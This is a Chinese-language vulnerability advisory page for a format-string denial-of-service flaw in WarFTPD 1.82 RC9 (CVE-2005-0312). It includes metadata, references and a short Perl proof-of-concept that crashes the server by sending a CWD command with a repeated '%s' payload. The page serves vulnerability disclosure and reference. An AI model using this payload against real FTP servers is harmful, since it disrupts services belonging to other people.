WarFTPD CWD 拒绝服务漏洞

WarFTPD CWD 拒绝服务漏洞

漏洞ID 1108420 漏洞类型 格式化字符串
发布时间 2005-01-27 更新时间 2005-10-20
图片[1]-WarFTPD CWD 拒绝服务漏洞-安全小百科CVE编号 CVE-2005-0312
图片[2]-WarFTPD CWD 拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200501-290
漏洞平台 Windows CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/25063
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-290
|漏洞详情
WarFTPD是一款windows平台下的FTP服务端软件。WarFTPD1.82RC9存在拒绝服务漏洞。当作为NT服务运行时,远程认证用户可通过使用带有特别构造路径名(如使用一个带有”%s”序列的字符串)的CWD命令,可导致访问冲突,产生拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/12384/info

War FTP Daemon is reported prone to a remote denial of service vulnerability. This issue arises because the application fails to handle exceptional conditions in a proper manner.

War FTP Daemon 1.82.00-RC9 is reported prone to this issue. It is likely that previous versions are vulnerable as well.

#!/usr/bin/perl -w
# remote DoS PoC Exploit for WarFTPD 1.82 RC9
# THX 2 barabas 4 his GoldenFTP-sploit :)
# greetings fly out to Foobar

use strict;
use Net::FTP;
my $payload="%s"x115;

my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("anonymous","[email protected]");
$ftp->quot("CWD",$payload);
|参考资料

来源:BID
名称:12384
链接:http://www.securityfocus.com/bid/12384
来源:BUGTRAQ
名称:20050127WarFTPD1.82RC9DoS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110687202332039&w;=2
来源:XF
名称:warftpd-cwd-dos(19129)
链接:http://xforce.iss.net/xforce/xfdb/19129
来源:support.jgaa.com
链接:http://support.jgaa.com/index.php?cmd=ShowReport&ID;=02643

相关推荐: Elm Development Group ELM 2.4/2.5.1 Mail for UNIX – ELM Buffer Overflow (1)

Elm Development Group ELM 2.4/2.5.1 Mail for UNIX – ELM Buffer Overflow (1) 漏洞ID 1053445 漏洞类型 发布时间 2000-05-07 更新时间 2000-05-07 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享